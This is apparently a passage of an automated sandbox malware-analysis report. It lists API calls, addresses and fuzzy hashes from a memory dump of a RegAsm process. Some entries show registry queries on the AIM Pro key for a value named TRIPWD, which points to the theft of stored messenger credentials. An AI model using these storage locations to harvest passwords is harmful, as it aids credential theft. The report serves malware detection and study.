                                                                                                                                              • Opcode Fuzzy Hash: 36fe1095114160a690701a78f195309e8067f9881caaff21558cd16a9a1fec4e
                                                                                                                                              • Instruction Fuzzy Hash: 74113DB2D0025CAEDB11DF98DC45BDEBBBCAB55304F0404EAA529B3241D7B45F888F65
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040FA34: memset.MSVCRT ref: 0040FA77
                                                                                                                                                • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FA8E
                                                                                                                                                • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FA97
                                                                                                                                                • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FAF0
                                                                                                                                                • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FAFE
                                                                                                                                                • Part of subcall function 00406D2B: GetFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040F9E7,00000000,?,00000000,?,?,00000000), ref: 00406D46
                                                                                                                                                • Part of subcall function 00406D2B: CloseHandle.KERNEL32(00000000), ref: 00406D4F
                                                                                                                                              • CompareFileTime.KERNEL32(?,?,00000000,?,?,00000000), ref: 0040F9F1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: strlen$FileTime$CloseCompareHandlememset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3621460190-0
                                                                                                                                              • Opcode ID: f102af4ea2b32b0dd4e7b33198291439d6dd7ffc9cc7ac928c90ed2ef3e39010
                                                                                                                                              • Instruction ID: df050e5846938951bd5ef1dd521a076978c5ac7e099cd3a6f0bbe67f44093ab2
                                                                                                                                              • Opcode Fuzzy Hash: f102af4ea2b32b0dd4e7b33198291439d6dd7ffc9cc7ac928c90ed2ef3e39010
                                                                                                                                              • Instruction Fuzzy Hash: 5C114FB2E00109ABDB15EFE9D9415EEBBB9AF44304F20407BE906F3281D6389E45CB65
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00411D68: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                                                                • Part of subcall function 00411D82: RegQueryValueExA.KERNEL32(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                                                                                                                              • RegCloseKey.KERNEL32(00000000,?,00000000,00000000), ref: 00411DE3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3677997916-0
                                                                                                                                              • Opcode ID: ce370e884ce507cf8d68f29c6deb264c45e70fef735a89ca04c9f3106877318e
                                                                                                                                              • Instruction ID: e75928c52d3f354008a7740bfd8d53285fea356ba949639daa147f4e4c12ed07
                                                                                                                                              • Opcode Fuzzy Hash: ce370e884ce507cf8d68f29c6deb264c45e70fef735a89ca04c9f3106877318e
                                                                                                                                              • Instruction Fuzzy Hash: BFE0ED7A600108BBDF119F96ED069DE7BA9EF84355B104025FE0191121E631EE50DA54
                                                                                                                                              APIs
                                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: QueryValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3660427363-0
                                                                                                                                              • Opcode ID: 37570f48f22fb23ef0d3df0d3c669cd07964a3a6542881bee3074b52f4b94034
                                                                                                                                              • Instruction ID: a80749d54e4db297dbe5ce684396449be2bdfe43891eac82306683b5e99974c7
                                                                                                                                              • Opcode Fuzzy Hash: 37570f48f22fb23ef0d3df0d3c669cd07964a3a6542881bee3074b52f4b94034
                                                                                                                                              • Instruction Fuzzy Hash: 21E0B675504208FADB01CB90DC41EEE7BBCEB44644F1041AAB90596151E672AB449B64
                                                                                                                                              APIs
                                                                                                                                              • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00411D5E
                                                                                                                                                • Part of subcall function 00411C43: memset.MSVCRT ref: 00411C61
                                                                                                                                                • Part of subcall function 00411C43: _itoa.MSVCRT ref: 00411C78
                                                                                                                                                • Part of subcall function 00411C43: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 00411C87
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4165544737-0
                                                                                                                                              • Opcode ID: 64c123335bceee9c141adbd0577c67007e2c975ffdfd429c4cd850d6effa1a87
                                                                                                                                              • Instruction ID: 191c8e33efa92f5acf0b5800ded4dbdf6d41edfd47def5b2a3195e96d71d9d98
                                                                                                                                              • Opcode Fuzzy Hash: 64c123335bceee9c141adbd0577c67007e2c975ffdfd429c4cd850d6effa1a87
                                                                                                                                              • Instruction Fuzzy Hash: 28E0B632004609EBCF125F90EC05AE93F76FF44315F548459FA5C04530D33295B0AF84
                                                                                                                                              APIs
                                                                                                                                              • RegEnumKeyExA.KERNEL32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Enum
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2928410991-0
                                                                                                                                              • Opcode ID: a06bf5f15d9de0ab9359c487783e21236e19a74e9470d356b60f65c87538d07b
                                                                                                                                              • Instruction ID: cd556759a7b58b048314e6dc47e00111cf408287f7a5d392ad8679ce4621aa7a
                                                                                                                                              • Opcode Fuzzy Hash: a06bf5f15d9de0ab9359c487783e21236e19a74e9470d356b60f65c87538d07b
                                                                                                                                              • Instruction Fuzzy Hash: 82D042B550010EBFDB01DFA0DD05DEA7BBDEB04248F008061BD15D6150D6719A15ABA4
                                                                                                                                              APIs
                                                                                                                                              • FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                              • Opcode ID: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
                                                                                                                                              • Instruction ID: e399220ee4d6b13c72a3c0d8b1802730825471fdce5c5047c746ffbeb5b4c0d0
                                                                                                                                              • Opcode Fuzzy Hash: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
                                                                                                                                              • Instruction Fuzzy Hash: 95C09B71111701CBF7214F50C948793B7F4BF40717F50485C95D5D5080D77CD554DA18
                                                                                                                                              APIs
                                                                                                                                              • EnumResourceNamesA.KERNEL32(?,?,Function_0001208B,00000000), ref: 00412120
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnumNamesResource
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3334572018-0
                                                                                                                                              • Opcode ID: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
                                                                                                                                              • Instruction ID: 035a6a4498e4538559194e0194001357af3b3daa9477d160ae033d236808df75
                                                                                                                                              • Opcode Fuzzy Hash: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
                                                                                                                                              • Instruction Fuzzy Hash: F1C09B31594741D7D7119F608D05F5B7E95BB9C701F114D397355D40A4D7514024D605
                                                                                                                                              APIs
                                                                                                                                              • FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseFind
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1863332320-0
                                                                                                                                              • Opcode ID: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
                                                                                                                                              • Instruction ID: 0badf10416d1e61bd1c3ad237588f2502b9813823e024cd162efce7da5e32b0f
                                                                                                                                              • Opcode Fuzzy Hash: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
                                                                                                                                              • Instruction Fuzzy Hash: B5C09270A109019BE22C5F38EC5986E77E1AF8A3343B45F6CA0F3E20F0E73895428A04
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Open
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                              • Opcode ID: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
                                                                                                                                              • Instruction ID: ce7f413466e1863fe1078dd7deec7b9c9a94e59086d3684c19d06f0563d6b072
                                                                                                                                              • Opcode Fuzzy Hash: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
                                                                                                                                              • Instruction Fuzzy Hash: 5CC09235548301FFDE128F80EE0AF4ABFA2BBC8B05F508818B284240B1C2728824EB57
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                              • Opcode ID: 77a73d6f288b94d7a7248812d8204c1d44c35e38f391bb5ddf3e052da3bda440
                                                                                                                                              • Instruction ID: 66443cf59350c8d7b1baefe17900325ca04844ca679cc43594c3e66389cfa9db
                                                                                                                                              • Opcode Fuzzy Hash: 77a73d6f288b94d7a7248812d8204c1d44c35e38f391bb5ddf3e052da3bda440
                                                                                                                                              • Instruction Fuzzy Hash: 48B012752104009BCB090B34DD451CD35505F84631720473CB033C40F0E720CC60BA00